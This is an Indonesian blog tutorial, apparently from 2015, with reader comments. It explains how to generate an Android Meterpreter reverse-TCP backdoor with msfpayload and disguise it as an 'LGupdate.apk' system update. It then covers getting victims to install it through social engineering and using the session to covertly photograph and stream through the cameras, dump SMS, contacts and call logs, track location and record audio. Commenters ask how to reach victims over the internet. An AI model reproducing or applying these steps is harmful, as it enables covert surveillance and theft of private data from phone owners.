Learning Pentesting 4: Hacking Android dengan Metasploit

Android. Seperti layaknya Operating System lainnya, juga bisa dieksploitasi (baca: di-hack).

Tidak ada yang spesial dari tulisan kali ini, sekedar mengisi waktu luang di sela “clinic time”, sekaligus melunasi permintaan dari beberapa teman untuk hacking  dengan target android.

Lab yang dibuat untuk percobaan kali ini sebagai berikut:

1. Attacker: Kali Linux 1.09a Persistence USB dijalankan pada netbook Asus eeePC seashell 1015PX

2. Victim: Android JellyBean (Sony Xperia M dual), Android KitKat (LG G3)

3. ISP: telkomsel flash ultima. Dibagi dengan android wifi tethering (LG G3)

4. Metasploit framework: Exploit: exploit/multi/handler; payload: android/meterpreter/reverse_tcp

Langkah:

1. Buat dulu payloadnya (backdoor) dengan perintah seperti berikut di bawah

msfpayload android/meterpreter/reverse_tcp lhost=nomorIP lport=nomorPort R > namaaplikasi.apk

Screenshot from 2015-07-27 09:55:06

Screenshot from 2015-07-27 09:57:15

LGupdate.apk sebelum ditransfer

2. Transfer file backdoornya ke target. Setelah perintah di atas dijalankan, maka pada kasus saya akan tercipta file apk dengan nama LGupdate.apk Selanjutnya tinggal bagaimana file tersebut bisa sampai ke smartphone android victim. (you could always try soceng).

Screenshot_2015-07-27-11-41-34

LGupdate.apk di HP victim

3. Install file apk di smartphone victim. File apk yang diinstall akan berubah nama menjadi MainActivity. Saat di-tap maka penampakan yang muncul di smartphone target kurang lebihnya seperti berikut:

Screenshot_2015-07-27-11-41-474. Siapkan Modul Exploit.  Ketikkan msfconsole pada terminal diikuti dengan perintah seperti berikut:

Screenshot from 2015-07-27 10:33:18Pada percobaan eksploitasi saya di beberapa kesempatan awal sempat gagal dan keluar output error message –> meterpreter session closed. Reason: Died.

Jika tercipta koneksi, maka akan muncul pesan “meterpreter session opened” dan… Bingo!!! Konsol msf > akan berubah menjadi konsol meterpreter >

Lantas apa saja yang bisa kita lakukan dengan meng-hack android dari metasploit? Ada banyak. Bahkan lebih banyak daripada menghack distro linux lainnya.

1. Webcam Snap dan Webcam Stream. Kita bisa mengeksploitasi kamera depan dan kamera belakang pada smartphone target. Hebatnya lagi, beda dengan proses snapping dan streaming camera di netbook atau notebook, di smartphone android benar-benar stealth karena tidak ada lampu indikator yang menyala saat kamera sedang aktif dan juga tidak terjadi apa-apa pada layar target. Fitur ini sangat berbahaya.

Screenshot from 2015-07-27 12:01:18

webcam_snap pada kamera depan

Screenshot from 2015-07-27 12:30:49

webcam_stream pada kamera belakang

Pada saat melakukan streaming camera, halaman browser akan terbuka dan proses paparazzi akan terus berjalan sampai dihentikan manual. Baik kamera depan maupun kamera belakang bisa dipilih mana saja yang diinginkan.

2. Dump call log, sms & contact. Hal berbahaya lainnya adalah hacker bisa mengakses data credential kita seperti berikut.

Screenshot from 2015-07-27 11:57:10Hasil dumpingnya juga sangat memuaskan. Semua contact akan muncul, dan urutannya sesuai dengan urutan kita memasukkan contact.

Screenshot from 2015-07-27 13:20:36e

call log dump

Screenshot from 2015-07-27 13:19:05

Screenshot from 2015-07-27 13:17:16Selain dari proses dumping di atas, kita juga bisa mengetahui lokasi seseorang berdasarkan fitur geolocation dan kemudian mengecek mapping lokasi tersebut secara online…🙂

3. Merekam suara victim. Kita dapat menyesuaikan waktu yang diinginkan saat proses perekaman. Hasilnya akan tersimpan dengan format ekstensi wav

voice recording

voice recording

Masih banyak metode post modul lainnya yang bisa dicoba, silakan bereksperimen dan mengeksplorasi. Good luck!!!

Pesan moralnya: Jangan pernah menginstall aplikasi android dari sumber yang tidak terpercaya, bahkan di google play store pun masih bisa ada celah keamanan seperti di atas. Pastikan menggunakan antivirus seperti avast, mcafee dsb. (walaupun juga tidak menjamin keamanan, setidaknya bisa sedikit memfilter koneksi). Minimalisir penggunaan transaksi online melalui smartphone android. Jangan coba-coba bawa smartphone ke kamar mandi😛 Dan jangan menyimpan konten dewasa pribadi pada smartphone😛

Tutorial sebelumnya:

28 comments on “Learning Pentesting 4: Hacking Android dengan Metasploit

  1. bardym says:

    Webcam Snap dan Webcam Stream… saya pernah coba, tapi gabisa utk kamera depan, command nya apa ya utk kamera depan?

  2. user says:

    #WTA
    kalo beda jaringan tanpa port forwarding gimna tuh mas

  3. CaCan says:

    Saya sudah praktikkan yang di jaringan LAN berhasil min, trs saya coba dengan jaringan WAN dengan IP publik dan forward router saya untuk mendapat respon, tapi kok hanya mendapat core command saja ya? jadi tidak bisa akses command stdapi, seperti dump_sms, dll.

  4. Rheinhard says:

    Ini tuh lewat windows apagimana gan?

  5. Gyokanji says:

    Saya udah nyoba beberapa kali om, tapi payloads selalu gagal di instal. Apa karena saya pake kali linux live usb ya?

  6. fadil says:

    misi mas saya ingin penjelasan nih,pada saat membuat payload android sukses,tapi pas mainActivty nya di instal di HH apk tidak terinstall,mohon penjelasan nya mas..

  7. kevin says:

    gan kalo pake linux backbox bisa gk?
    trus caranya sama ??
    buat tugas Sistem operasi ini ,kmaren udh coba di hp yg os ny 4.1,hp ny udh di connect ke laptop tapi gagal

  8. wendy says:

    mas kalau misalkan aplikasi yang kita masukan sdh terinstal d hp korban terus tiba2 jaringan internet kita mati apa kita harus mulai ulang membuat perintah seperti di atas? lalu mengirimkan kembali aplikasi backdoornya?sblmnya trimksh tutorialnya mas.

  9. hanifah says:

    udah bisa di instal dan udah jalan. tapi kadang2 langsung berhenti. pesannya: meterpreter session closed. Reason: Died. padahal masih konek ke jaringan yang sama. trus pak aku instal di hp yang lain udah gag mw terinstal. itu knp yah? mohon penjelasannya. makasihh

  10. hanifah says:

    sdh berhasil install dan sdh jalan tp kadang2 berhenti. dgn pesan: meterpreter session closed. Reason: Died.. padahal masih konek pada jaringan yang sama. itu knp yah? mohon penjelasannya. makasih

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s